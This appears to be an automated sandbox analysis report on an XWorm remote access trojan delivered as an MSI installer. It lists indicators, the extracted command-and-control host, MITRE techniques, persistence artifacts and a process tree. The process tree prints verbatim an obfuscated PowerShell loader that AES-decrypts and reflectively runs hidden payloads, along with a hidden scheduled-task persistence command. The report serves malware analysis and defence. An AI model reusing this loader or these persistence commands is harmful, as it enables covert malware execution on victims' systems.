xworm | 594e87ea4d40331411e9b52033db03db5fd2399c023b3f132f277b6ad40535d4

Analysis

max time kernel
300s
max time network
298s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
11-05-2024 08:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

test.msi
Size

1.1MB
MD5

0dbd897947fd3fd75af9b67b8517d2f4
SHA1

ef3fb6baf23c3228a9dc9751f1af5178c12d5a33
SHA256

594e87ea4d40331411e9b52033db03db5fd2399c023b3f132f277b6ad40535d4
SHA512

b43547b23a1969da024bfaed654bcf6fca167962dd09810191e3ee838460b66ba92307009d0034efb9c08fc80f374ceff612b83a5f8a840bbb6b56f42c9183ab
SSDEEP

24576:xEfVw748eBaCifrIFI24kuMdJhycvkA5nY28ERhpZQKAv671XlmEtnOr:xEyc8eorIF74kuMdJ0cvtnY28ERh/QwC

Score

10^/10

xworm execution persistence rat trojan

Malware Config

Extracted

Family

xworm

case-shield.gl.at.ply.gg:26501

Attributes

Install_directory
%Userprofile%
install_file
system.exe

Signatures

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1944-112-0x0000000007190000-0x00000000071AC000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

31 1944 powershell.exe
54 1944 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

1944 powershell.exe
2388 powershell.exe
4352 powershell.exe
5112 powershell.exe
3904 powershell.exe
2980 powershell.exe
3924 powershell.exe

flow	pid	process
31	1944	powershell.exe
54	1944	powershell.exe

pid	process
1944	powershell.exe
2388	powershell.exe
4352	powershell.exe
5112	powershell.exe
3904	powershell.exe
2980	powershell.exe
3924	powershell.exe

Drops startup file 3 IoCs

Processes:

powershell.exeTBYPAE.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system.lnk	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OSBLTR.lnk	TBYPAE.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system.lnk	powershell.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

TBYPAE.exepowershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OSBLTR = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windata\\system.exe\""	TBYPAE.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system = "C:\\Users\\Admin\\system.exe"	powershell.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

30 ip-api.com

flow	ioc
30	ip-api.com

AutoIT Executable 36 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
behavioral2/memory/4880-116-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral2/memory/3924-119-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral2/memory/3924-120-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral2/memory/4880-189-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral2/memory/4880-218-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral2/memory/4880-219-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral2/memory/4880-220-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral2/memory/4880-224-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral2/memory/4880-226-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral2/memory/4880-228-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral2/memory/4620-231-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral2/memory/4880-242-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral2/memory/4880-243-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral2/memory/4880-244-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral2/memory/4880-245-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral2/memory/4880-246-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral2/memory/4880-247-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral2/memory/1780-249-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral2/memory/4880-250-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral2/memory/4880-251-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral2/memory/4880-252-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral2/memory/4880-253-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral2/memory/4880-254-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral2/memory/4880-255-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral2/memory/408-257-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral2/memory/408-258-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral2/memory/4880-259-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral2/memory/4880-260-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral2/memory/4880-261-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral2/memory/4880-262-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral2/memory/4880-263-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral2/memory/4880-264-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral2/memory/4968-266-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral2/memory/4880-267-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral2/memory/4880-268-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral2/memory/4880-269-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

MSI221A.tmpWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	MSI221A.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops file in Windows directory 8 IoCs

Processes:

msiexec.exe

description	ioc	process
File created	C:\Windows\Installer\SourceHash{29EF7317-DCA1-4159-97B2-C883AD400AC6}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI219C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI221A.tmp	msiexec.exe
File created	C:\Windows\Installer\e582093.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e582093.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe

Executes dropped EXE 8 IoCs

Processes:

MSI221A.tmpTBYPAE.exesystem.exesystem.exesystem.exesystem.exesystem.exesystem.exe

pid process

880 MSI221A.tmp
4880 TBYPAE.exe
3924 system.exe
4620 system.exe
2920 system.exe
1780 system.exe
408 system.exe
4968 system.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
880	MSI221A.tmp
4880	TBYPAE.exe
3924	system.exe
4620	system.exe
2920	system.exe
1780	system.exe
408	system.exe
4968	system.exe

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vssvc.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000b7d72a8ac39dc2e30000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000b7d72a8a0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900b7d72a8a000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1db7d72a8a000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000b7d72a8a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

4060 schtasks.exe
884 schtasks.exe
Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings powershell.exe

pid	process
4060	schtasks.exe
884	schtasks.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msiexec.exeTBYPAE.exe

pid	process
2932	msiexec.exe
2932	msiexec.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe
4880	TBYPAE.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

TBYPAE.exe

pid process

4880 TBYPAE.exe

pid	process
4880	TBYPAE.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

msiexec.exemsiexec.exevssvc.exepowershell.exepowershell.exe

description	pid	process
Token: SeShutdownPrivilege	4704	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4704	msiexec.exe
Token: SeSecurityPrivilege	2932	msiexec.exe
Token: SeCreateTokenPrivilege	4704	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	4704	msiexec.exe
Token: SeLockMemoryPrivilege	4704	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4704	msiexec.exe
Token: SeMachineAccountPrivilege	4704	msiexec.exe
Token: SeTcbPrivilege	4704	msiexec.exe
Token: SeSecurityPrivilege	4704	msiexec.exe
Token: SeTakeOwnershipPrivilege	4704	msiexec.exe
Token: SeLoadDriverPrivilege	4704	msiexec.exe
Token: SeSystemProfilePrivilege	4704	msiexec.exe
Token: SeSystemtimePrivilege	4704	msiexec.exe
Token: SeProfSingleProcessPrivilege	4704	msiexec.exe
Token: SeIncBasePriorityPrivilege	4704	msiexec.exe
Token: SeCreatePagefilePrivilege	4704	msiexec.exe
Token: SeCreatePermanentPrivilege	4704	msiexec.exe
Token: SeBackupPrivilege	4704	msiexec.exe
Token: SeRestorePrivilege	4704	msiexec.exe
Token: SeShutdownPrivilege	4704	msiexec.exe
Token: SeDebugPrivilege	4704	msiexec.exe
Token: SeAuditPrivilege	4704	msiexec.exe
Token: SeSystemEnvironmentPrivilege	4704	msiexec.exe
Token: SeChangeNotifyPrivilege	4704	msiexec.exe
Token: SeRemoteShutdownPrivilege	4704	msiexec.exe
Token: SeUndockPrivilege	4704	msiexec.exe
Token: SeSyncAgentPrivilege	4704	msiexec.exe
Token: SeEnableDelegationPrivilege	4704	msiexec.exe
Token: SeManageVolumePrivilege	4704	msiexec.exe
Token: SeImpersonatePrivilege	4704	msiexec.exe
Token: SeCreateGlobalPrivilege	4704	msiexec.exe
Token: SeBackupPrivilege	1568	vssvc.exe
Token: SeRestorePrivilege	1568	vssvc.exe
Token: SeAuditPrivilege	1568	vssvc.exe
Token: SeBackupPrivilege	2932	msiexec.exe
Token: SeRestorePrivilege	2932	msiexec.exe
Token: SeRestorePrivilege	2932	msiexec.exe
Token: SeTakeOwnershipPrivilege	2932	msiexec.exe
Token: SeRestorePrivilege	2932	msiexec.exe
Token: SeTakeOwnershipPrivilege	2932	msiexec.exe
Token: SeRestorePrivilege	2932	msiexec.exe
Token: SeTakeOwnershipPrivilege	2932	msiexec.exe
Token: SeRestorePrivilege	2932	msiexec.exe
Token: SeTakeOwnershipPrivilege	2932	msiexec.exe
Token: SeRestorePrivilege	2932	msiexec.exe
Token: SeTakeOwnershipPrivilege	2932	msiexec.exe
Token: SeDebugPrivilege	2388	powershell.exe
Token: SeDebugPrivilege	4352	powershell.exe
Token: SeIncreaseQuotaPrivilege	4352	powershell.exe
Token: SeSecurityPrivilege	4352	powershell.exe
Token: SeTakeOwnershipPrivilege	4352	powershell.exe
Token: SeLoadDriverPrivilege	4352	powershell.exe
Token: SeSystemProfilePrivilege	4352	powershell.exe
Token: SeSystemtimePrivilege	4352	powershell.exe
Token: SeProfSingleProcessPrivilege	4352	powershell.exe
Token: SeIncBasePriorityPrivilege	4352	powershell.exe
Token: SeCreatePagefilePrivilege	4352	powershell.exe
Token: SeBackupPrivilege	4352	powershell.exe
Token: SeRestorePrivilege	4352	powershell.exe
Token: SeShutdownPrivilege	4352	powershell.exe
Token: SeDebugPrivilege	4352	powershell.exe
Token: SeSystemEnvironmentPrivilege	4352	powershell.exe
Token: SeRemoteShutdownPrivilege	4352	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

msiexec.exe

pid process

4704 msiexec.exe
4704 msiexec.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

powershell.exe

pid process

1944 powershell.exe

pid	process
4704	msiexec.exe
4704	msiexec.exe

pid	process
1944	powershell.exe

Suspicious use of WriteProcessMemory 50 IoCs

Processes:

msiexec.exeMSI221A.tmpTBYPAE.execmd.execmd.exepowershell.exeWScript.execmd.exepowershell.exe

description	pid	process	target process
PID 2932 wrote to memory of 3928	2932	msiexec.exe	srtasks.exe
PID 2932 wrote to memory of 3928	2932	msiexec.exe	srtasks.exe
PID 2932 wrote to memory of 880	2932	msiexec.exe	MSI221A.tmp
PID 2932 wrote to memory of 880	2932	msiexec.exe	MSI221A.tmp
PID 2932 wrote to memory of 880	2932	msiexec.exe	MSI221A.tmp
PID 880 wrote to memory of 1452	880	MSI221A.tmp	cmd.exe
PID 880 wrote to memory of 1452	880	MSI221A.tmp	cmd.exe
PID 880 wrote to memory of 1452	880	MSI221A.tmp	cmd.exe
PID 880 wrote to memory of 4880	880	MSI221A.tmp	TBYPAE.exe
PID 880 wrote to memory of 4880	880	MSI221A.tmp	TBYPAE.exe
PID 880 wrote to memory of 4880	880	MSI221A.tmp	TBYPAE.exe
PID 4880 wrote to memory of 3784	4880	TBYPAE.exe	cmd.exe
PID 4880 wrote to memory of 3784	4880	TBYPAE.exe	cmd.exe
PID 4880 wrote to memory of 3784	4880	TBYPAE.exe	cmd.exe
PID 4880 wrote to memory of 2172	4880	TBYPAE.exe	WSCript.exe
PID 4880 wrote to memory of 2172	4880	TBYPAE.exe	WSCript.exe
PID 4880 wrote to memory of 2172	4880	TBYPAE.exe	WSCript.exe
PID 3784 wrote to memory of 4060	3784	cmd.exe	schtasks.exe
PID 3784 wrote to memory of 4060	3784	cmd.exe	schtasks.exe
PID 3784 wrote to memory of 4060	3784	cmd.exe	schtasks.exe
PID 1452 wrote to memory of 2388	1452	cmd.exe	powershell.exe
PID 1452 wrote to memory of 2388	1452	cmd.exe	powershell.exe
PID 1452 wrote to memory of 2388	1452	cmd.exe	powershell.exe
PID 2388 wrote to memory of 4352	2388	powershell.exe	powershell.exe
PID 2388 wrote to memory of 4352	2388	powershell.exe	powershell.exe
PID 2388 wrote to memory of 4352	2388	powershell.exe	powershell.exe
PID 2388 wrote to memory of 4992	2388	powershell.exe	WScript.exe
PID 2388 wrote to memory of 4992	2388	powershell.exe	WScript.exe
PID 2388 wrote to memory of 4992	2388	powershell.exe	WScript.exe
PID 4992 wrote to memory of 4540	4992	WScript.exe	cmd.exe
PID 4992 wrote to memory of 4540	4992	WScript.exe	cmd.exe
PID 4992 wrote to memory of 4540	4992	WScript.exe	cmd.exe
PID 4540 wrote to memory of 1944	4540	cmd.exe	powershell.exe
PID 4540 wrote to memory of 1944	4540	cmd.exe	powershell.exe
PID 4540 wrote to memory of 1944	4540	cmd.exe	powershell.exe
PID 1944 wrote to memory of 5112	1944	powershell.exe	powershell.exe
PID 1944 wrote to memory of 5112	1944	powershell.exe	powershell.exe
PID 1944 wrote to memory of 5112	1944	powershell.exe	powershell.exe
PID 1944 wrote to memory of 3904	1944	powershell.exe	powershell.exe
PID 1944 wrote to memory of 3904	1944	powershell.exe	powershell.exe
PID 1944 wrote to memory of 3904	1944	powershell.exe	powershell.exe
PID 1944 wrote to memory of 2980	1944	powershell.exe	powershell.exe
PID 1944 wrote to memory of 2980	1944	powershell.exe	powershell.exe
PID 1944 wrote to memory of 2980	1944	powershell.exe	powershell.exe
PID 1944 wrote to memory of 3924	1944	powershell.exe	powershell.exe
PID 1944 wrote to memory of 3924	1944	powershell.exe	powershell.exe
PID 1944 wrote to memory of 3924	1944	powershell.exe	powershell.exe
PID 1944 wrote to memory of 884	1944	powershell.exe	schtasks.exe
PID 1944 wrote to memory of 884	1944	powershell.exe	schtasks.exe
PID 1944 wrote to memory of 884	1944	powershell.exe	schtasks.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\test.msi
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4704

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2932

C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
2⤵
PID:3928

C:\Windows\Installer\MSI221A.tmp
"C:\Windows\Installer\MSI221A.tmp"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:880

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\loader (5).bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:1452

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zzKVnsJKnozsmwXvfEHuC6CO4y3J9kqI8i4PQxgBEQY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Zet+bBMxhydASTp2X5UNA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $qKnYN=New-Object System.IO.MemoryStream(,$param_var); $QRXYz=New-Object System.IO.MemoryStream; $ylerv=New-Object System.IO.Compression.GZipStream($qKnYN, [IO.Compression.CompressionMode]::Decompress); $ylerv.CopyTo($QRXYz); $ylerv.Dispose(); $qKnYN.Dispose(); $QRXYz.Dispose(); $QRXYz.ToArray();}function execute_function($param_var,$param2_var){ $eVLsQ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Nfhti=$eVLsQ.EntryPoint; $Nfhti.Invoke($null, $param2_var);}$SyUpl = 'C:\Users\Admin\AppData\Local\Temp\loader (5).bat';$host.UI.RawUI.WindowTitle = $SyUpl;$TCVQo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($SyUpl).Split([Environment]::NewLine);foreach ($hHqem in $TCVQo) { if ($hHqem.StartsWith(':: ')) { $FEGCp=$hHqem.Substring(3); break; }}$payloads_var=[string[]]$FEGCp.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
4⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2388

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_742_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_742.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4352

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_742.vbs"
5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4992

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_742.bat" "
6⤵
- Suspicious use of WriteProcessMemory
PID:4540

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zzKVnsJKnozsmwXvfEHuC6CO4y3J9kqI8i4PQxgBEQY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Zet+bBMxhydASTp2X5UNA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $qKnYN=New-Object System.IO.MemoryStream(,$param_var); $QRXYz=New-Object System.IO.MemoryStream; $ylerv=New-Object System.IO.Compression.GZipStream($qKnYN, [IO.Compression.CompressionMode]::Decompress); $ylerv.CopyTo($QRXYz); $ylerv.Dispose(); $qKnYN.Dispose(); $QRXYz.Dispose(); $QRXYz.ToArray();}function execute_function($param_var,$param2_var){ $eVLsQ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Nfhti=$eVLsQ.EntryPoint; $Nfhti.Invoke($null, $param2_var);}$SyUpl = 'C:\Users\Admin\AppData\Roaming\startup_str_742.bat';$host.UI.RawUI.WindowTitle = $SyUpl;$TCVQo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($SyUpl).Split([Environment]::NewLine);foreach ($hHqem in $TCVQo) { if ($hHqem.StartsWith(':: ')) { $FEGCp=$hHqem.Substring(3); break; }}$payloads_var=[string[]]$FEGCp.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join 